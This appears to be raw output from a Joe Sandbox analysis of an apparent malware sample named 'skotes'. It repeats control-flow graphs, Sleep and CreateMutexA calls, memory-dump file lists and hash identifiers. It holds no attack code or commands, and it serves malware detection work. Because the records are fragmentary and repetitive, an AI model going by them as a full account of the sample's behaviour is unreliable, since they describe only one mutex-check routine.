                                                                                                                                                                                                                                                                control_flow_graph 22 aa9f44-aa9f64 26 aa9f92-aa9fae 22->26 27 aa9f66-aa9f72 22->27 30 aa9fdc-aa9ffb 26->30 31 aa9fb0-aa9fbc 26->31 28 aa9f88-aa9f8f call abd663 27->28 29 aa9f74-aa9f82 27->29 28->26 29->28 32 aaa92b 29->32 36 aaa029-aaa916 call ab80c0 30->36 37 aa9ffd-aaa009 30->37 34 aa9fbe-aa9fcc 31->34 35 aa9fd2-aa9fd9 call abd663 31->35 41 aaa953-aaa994 Sleep CreateMutexA 32->41 42 aaa92b call ad6c6a 32->42 34->32 34->35 35->30 38 aaa00b-aaa019 37->38 39 aaa01f-aaa026 call abd663 37->39 38->32 38->39 39->36 51 aaa996-aaa998 41->51 52 aaa9a7-aaa9a8 41->52 42->41 51->52 54 aaa99a-aaa9a5 51->54 54->52
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.1754799297.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1754737566.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1754799297.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755139942.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755298174.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755353906.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755739076.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755765591.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755792758.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755792758.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755840673.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755861047.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755889894.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755907151.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755931575.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755950655.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755966139.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755986614.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756004287.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756021452.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756043120.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756058423.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756072999.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756087074.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756104093.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756121466.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756137947.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756154534.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756172322.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756190023.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756205592.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756220484.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756238338.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756254012.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756276410.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756291352.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756291352.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756335498.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756351675.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756366936.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756382308.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756400469.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756415306.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: c58344804e05ad070ba2284b3ad327a8b57063b03459ae57c844895b70962431
                                                                                                                                                                                                                                                                • Instruction ID: dee8595c366d4013a18ed9a5d6de72914f6dab3da705173393d1be0fb28b4dd3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c58344804e05ad070ba2284b3ad327a8b57063b03459ae57c844895b70962431
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B03148317002009BEB189B79DD9C7AEF7A6EB97310F204619E018DB2D5D7368981C722

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 56 aaa079-aaa099 60 aaa09b-aaa0a7 56->60 61 aaa0c7-aaa0e3 56->61 62 aaa0a9-aaa0b7 60->62 63 aaa0bd-aaa0c4 call abd663 60->63 64 aaa111-aaa130 61->64 65 aaa0e5-aaa0f1 61->65 62->63 66 aaa930 62->66 63->61 70 aaa15e-aaa916 call ab80c0 64->70 71 aaa132-aaa13e 64->71 68 aaa0f3-aaa101 65->68 69 aaa107-aaa10e call abd663 65->69 74 aaa953-aaa994 Sleep CreateMutexA 66->74 75 aaa930 call ad6c6a 66->75 68->66 68->69 69->64 77 aaa140-aaa14e 71->77 78 aaa154-aaa15b call abd663 71->78 85 aaa996-aaa998 74->85 86 aaa9a7-aaa9a8 74->86 75->74 77->66 77->78 78->70 85->86 88 aaa99a-aaa9a5 85->88 88->86
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.1754799297.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1754737566.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1754799297.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755139942.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755298174.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755353906.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755739076.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755765591.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755792758.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755792758.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755840673.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755861047.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755889894.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755907151.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755931575.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755950655.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755966139.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755986614.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756004287.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756021452.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756043120.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756058423.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756072999.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756087074.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756104093.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756121466.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756137947.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756154534.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756172322.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756190023.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756205592.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756220484.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756238338.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756254012.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756276410.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756291352.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756291352.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756335498.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756351675.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756366936.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756382308.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756400469.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756415306.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: 090d0a733f5b1e553e66b2d8c68606c35c397604b165d8f47e5cfab1bbebbf5b
                                                                                                                                                                                                                                                                • Instruction ID: 8eaa60b59a7bfdcfdb31c92bf32b2e7ab7b8ef6f64fdee4a0a0cf233a0b2405a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 090d0a733f5b1e553e66b2d8c68606c35c397604b165d8f47e5cfab1bbebbf5b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 983146317102009BEB08DB78DD9DBADF7F6DBA7310F208219E018973D5D7369981C622

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 90 aaa1ae-aaa1ce 94 aaa1fc-aaa218 90->94 95 aaa1d0-aaa1dc 90->95 98 aaa21a-aaa226 94->98 99 aaa246-aaa265 94->99 96 aaa1de-aaa1ec 95->96 97 aaa1f2-aaa1f9 call abd663 95->97 96->97 100 aaa935 96->100 97->94 102 aaa228-aaa236 98->102 103 aaa23c-aaa243 call abd663 98->103 104 aaa293-aaa916 call ab80c0 99->104 105 aaa267-aaa273 99->105 109 aaa953-aaa994 Sleep CreateMutexA 100->109 110 aaa935 call ad6c6a 100->110 102->100 102->103 103->99 106 aaa289-aaa290 call abd663 105->106 107 aaa275-aaa283 105->107 106->104 107->100 107->106 119 aaa996-aaa998 109->119 120 aaa9a7-aaa9a8 109->120 110->109 119->120 122 aaa99a-aaa9a5 119->122 122->120
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.1754799297.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1754737566.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1754799297.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755139942.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755298174.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755353906.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755739076.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755765591.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755792758.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755792758.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755840673.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755861047.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755889894.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755907151.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755931575.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755950655.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755966139.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755986614.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756004287.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756021452.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756043120.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756058423.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756072999.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756087074.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756104093.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756121466.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756137947.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756154534.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756172322.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756190023.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756205592.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756220484.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756238338.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756254012.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756276410.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756291352.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756291352.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756335498.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756351675.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756366936.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756382308.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756400469.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756415306.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: e4745247c1bfd03195e4c411165d1341906f0131e2923bb21f9fe4a90736cc79
                                                                                                                                                                                                                                                                • Instruction ID: e3061f6fad8afb4c4ddbd061a9f866ec63d07f5d2d407f7f5c615740911d1043
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e4745247c1bfd03195e4c411165d1341906f0131e2923bb21f9fe4a90736cc79
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B3124317002009BEB189BACDD9DBADF7F6ABA7310F204219E018973D1D73A8985C622

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 124 aaa418-aaa438 128 aaa43a-aaa446 124->128 129 aaa466-aaa482 124->129 130 aaa448-aaa456 128->130 131 aaa45c-aaa463 call abd663 128->131 132 aaa4b0-aaa4cf 129->132 133 aaa484-aaa490 129->133 130->131 136 aaa93f-aaa994 call ad6c6a * 4 Sleep CreateMutexA 130->136 131->129 134 aaa4fd-aaa916 call ab80c0 132->134 135 aaa4d1-aaa4dd 132->135 138 aaa492-aaa4a0 133->138 139 aaa4a6-aaa4ad call abd663 133->139 140 aaa4df-aaa4ed 135->140 141 aaa4f3-aaa4fa call abd663 135->141 160 aaa996-aaa998 136->160 161 aaa9a7-aaa9a8 136->161 138->136 138->139 139->132 140->136 140->141 141->134 160->161 162 aaa99a-aaa9a5 160->162 162->161
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.1754799297.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1754737566.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1754799297.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755139942.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755298174.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755353906.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755739076.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755765591.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755792758.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755792758.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755840673.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755861047.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755889894.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755907151.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755931575.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755950655.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755966139.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755986614.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756004287.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756021452.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756043120.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756058423.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756072999.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756087074.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756104093.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756121466.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756137947.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756154534.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756172322.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756190023.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756205592.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
